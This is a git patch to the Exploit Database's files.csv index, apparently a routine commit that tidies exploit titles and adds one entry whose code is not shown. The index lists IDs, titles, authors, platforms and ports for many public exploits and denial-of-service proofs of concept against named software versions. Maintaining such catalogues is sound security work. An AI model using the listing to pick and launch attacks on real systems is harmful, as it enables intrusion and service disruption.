From fa1b17f699ce002073fe75757bdf340be5c660e0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 30 Sep 2016 05:01:16 +0000 Subject: [PATCH] DB: 2016-09-30 1 new exploits Microsoft Windows - RPC DCOM Remote Exploit (18 Targets) Microsoft Windows - 'RPC DCOM' Remote Exploit (48 Targets) Microsoft Windows - 'RPC DCOM' Remote Exploit (1) Microsoft Windows - 'RPC DCOM' Remote Exploit (2) Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal Targets) Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal) Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate Get Request Remote Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow PMSoftware Simple Web Server - GET Request Remote Buffer Overflow CUPS Server 1.1 - (Get Request) Denial of Service CUPS Server 1.1 - GET Request Denial of Service BlueCoat WinProxy 6.0 R1c - (GET Request) Denial of Service BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC) TFTPD32 2.81 - GET Request Format String Denial of Service (PoC) Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow Multi-Threaded TFTP 1.1 - (Long Get Request) Denial of Service Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service Essentia Web Server 2.15 - (GET Request) Remote Denial of Service Essentia Web Server 2.15 - GET Request Remote Denial of Service webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow webdesproxy 0.0.1 - GET Request Remote Buffer Overflow webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield) webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield) Microsoft Windows Message Queuing Service - RPC Buffer Overflow (dnsname) Microsoft Windows Message Queuing Service - RPC Buffer Overflow Netgear WGR614v9 - Wireless Router Get Request Denial of Service Netgear WGR614v9 Wireless Router - GET Request Denial of Service XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow (PoC) XBMC 8.10 (Windows) - (GET Request) Remote Buffer Overflow XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC) XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow (SEH) httpdx 0.5b - FTP Server (USER) Remote Buffer Overflow (SEH) Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow (PoC) Mereo 1.8.0 - (Get Request) Remote Denial of Service Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Request Remote Denial of Service httpdx 0.5b FTP Server - (CWD) Remote Buffer Overflow (SEH) httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH) httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit ARD-9808 DVR Card Security Camera - (GET Request) Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service Kolibri+ WebServer 2 - (Get Request) Denial of Service Kolibri+ WebServer 2 - GET Request Denial of Service Kolibri+ WebServer 2 - (GET Request) Remote Overwrite (SEH) Kolibri+ WebServer 2 - GET Request Remote Overwrite (SEH) httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service httpdx 1.4 - Get Request Buffer Overflow httpdx 1.4 - GET Request Buffer Overflow Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC) httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC) HTTPDX - tolog() Function Format String (1) httpdx - tolog() Function Format String (1) HTTPDX - tolog() Function Format String (2) httpdx - tolog() Function Format String (2) HTTPDX - h_handlepeer() Function Buffer Overflow (Metasploit) httpdx - h_handlepeer() Function Buffer Overflow (Metasploit) glibc LD_AUDIT Arbitrary DSO - Load Privilege Escalation glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1) Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1) httpdx 1.5.4 - Remote HTTP Server Denial of Service httpdx 1.5.4 - HTTP Server Remote Denial of Service Working Resources BadBlue 1.7.3 - Get Request Denial of Service Working Resources BadBlue 1.7.3 - GET Request Denial of Service KeepNote 0.7.8 - Command Execution My Web Server 1.0.1/1.0.2 - Long Get Request Denial of Service My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service Snowblind Web Server 1.0/1.1 - (GET Request) Buffer Overflow Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow Proxomitron Proxy Server - Long Get Request Remote Denial of Service Proxomitron Proxy Server - Long GET Request Remote Denial of Service --- files.csv | 79 ++++++++++++++++--------------- platforms/multiple/local/40440.py | 45 ++++++++++++++++++ platforms/windows/dos/11343.py | 2 +- 3 files changed, 86 insertions(+), 40 deletions(-) create mode 100755 platforms/multiple/local/40440.py diff --git a/files.csv b/files.csv index 610ad63e8..686808d60 100755 --- a/files.csv +++ b/files.csv @@ -67,14 +67,14 @@ id,file,description,date,author,platform,type,port 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80 68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos,0 -69,platforms/windows/remote/69.c,"Microsoft Windows - RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 -70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135 +69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135 +70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos,0 74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 -76,platforms/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 +76,platforms/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal)",2003-08-07,oc192,windows,remote,135 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80 78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - System Exploit",2003-08-13,ash,windows,local,0 @@ -113,7 +113,7 @@ id,file,description,date,author,platform,type,port 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 -117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135 +117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0 @@ -699,7 +699,7 @@ id,file,description,date,author,platform,type,port 876,platforms/linux/local/876.c,"PaX - Double-Mirrored VMA munmap Privilege Escalation",2005-03-14,"Christophe Devine",linux,local,0 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",linux,local,0 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 -879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 +879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 880,platforms/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash",2005-03-15,Komrade,windows,dos,0 @@ -764,7 +764,7 @@ id,file,description,date,author,platform,type,port 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 -945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80 +945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - GET Request Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0 947,platforms/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service",2005-04-20,houseofdabus,multiple,dos,0 @@ -994,7 +994,7 @@ id,file,description,date,author,platform,type,port 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0 1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0 1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution (update2)",2005-09-04,tracewar,cgi,webapps,0 -1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - (Get Request) Denial of Service",2005-09-05,tracewar,linux,dos,0 +1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Request Denial of Service",2005-09-05,tracewar,linux,dos,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0 @@ -1176,7 +1176,7 @@ id,file,description,date,author,platform,type,port 1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0 1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80 -1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - (GET Request) Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 +1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0 @@ -1191,7 +1191,7 @@ id,file,description,date,author,platform,type,port 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 -1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 +1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Request Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0 1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0 @@ -1439,7 +1439,7 @@ id,file,description,date,author,platform,type,port 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0 -1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 +1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0 1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0 @@ -2031,7 +2031,7 @@ id,file,description,date,author,platform,type,port 2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD (solaris/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD (sco/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0 2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,php,webapps,0 -2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - (Long Get Request) Denial of Service",2006-09-08,n00b,windows,dos,0 +2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service",2006-09-08,n00b,windows,dos,0 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0 2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - (root_dir) Remote File Inclusion",2006-09-09,Kacper,php,webapps,0 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 @@ -2408,7 +2408,7 @@ id,file,description,date,author,platform,type,port 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0 2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0 -2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - (GET Request) Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 +2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0 2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0 @@ -3571,7 +3571,7 @@ id,file,description,date,author,platform,type,port 3910,platforms/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service",2007-05-12,shinnai,windows,dos,0 3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - 'id' SQL Injection",2007-05-14,CyberGhost,php,webapps,0 3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0 -3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 +3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) SQL Injection",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) Remote File Inclusion",2007-05-13,Mogatil,php,webapps,0 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0 @@ -3580,7 +3580,7 @@ id,file,description,date,author,platform,type,port 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - (prepend_adm.php) Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)",2007-05-14,shinnai,windows,dos,0 -3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 +3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113 @@ -4580,7 +4580,7 @@ id,file,description,date,author,platform,type,port 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service",2008-01-17,shinnai,windows,dos,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications - (RtspVaPgCtrl) Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0 -4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 +4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - rtlabel_id2name() Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,bsd,dos,0 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 @@ -7634,7 +7634,7 @@ id,file,description,date,author,platform,type,port 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0 8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 -8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 +8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - GET Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 @@ -7851,8 +7851,8 @@ id,file,description,date,author,platform,type,port 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",windows,dos,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote,0 -8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0 -8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - (GET Request) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 +8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0 +8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0 @@ -8222,13 +8222,13 @@ id,file,description,date,author,platform,type,port 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 -8716,platforms/windows/remote/8716.py,"httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow (SEH)",2009-05-18,His0k4,windows,remote,21 +8716,platforms/windows/remote/8716.py,"httpdx 0.5b - FTP Server (USER) Remote Buffer Overflow (SEH)",2009-05-18,His0k4,windows,remote,21 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps,0 8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0 8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0 -8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0 -8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - (Get Request) Remote Denial of Service",2009-05-18,Stack,windows,dos,0 +8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0 +8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - GET Request Remote Denial of Service",2009-05-18,Stack,windows,dos,0 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - 'id' SQL Injection",2009-05-18,Mi4night,php,webapps,0 8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,php,webapps,0 8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 @@ -8236,7 +8236,7 @@ id,file,description,date,author,platform,type,port 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password",2009-05-18,ahmadbady,php,webapps,0 8730,platforms/php/webapps/8730.txt,"VidShare Pro - Arbitrary File Upload",2009-05-19,InjEctOr5,php,webapps,0 8731,platforms/php/webapps/8731.php,"Joomla! Component com_gsticketsystem - 'catid' Blind SQL Injection",2009-05-19,InjEctOr5,php,webapps,0 -8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server - (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21 +8732,platforms/windows/remote/8732.py,"httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,windows,remote,21 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow",2009-05-19,rgod,windows,remote,0 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 @@ -8395,7 +8395,7 @@ id,file,description,date,author,platform,type,port 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 -8897,platforms/windows/remote/8897.c,"httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 +8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0 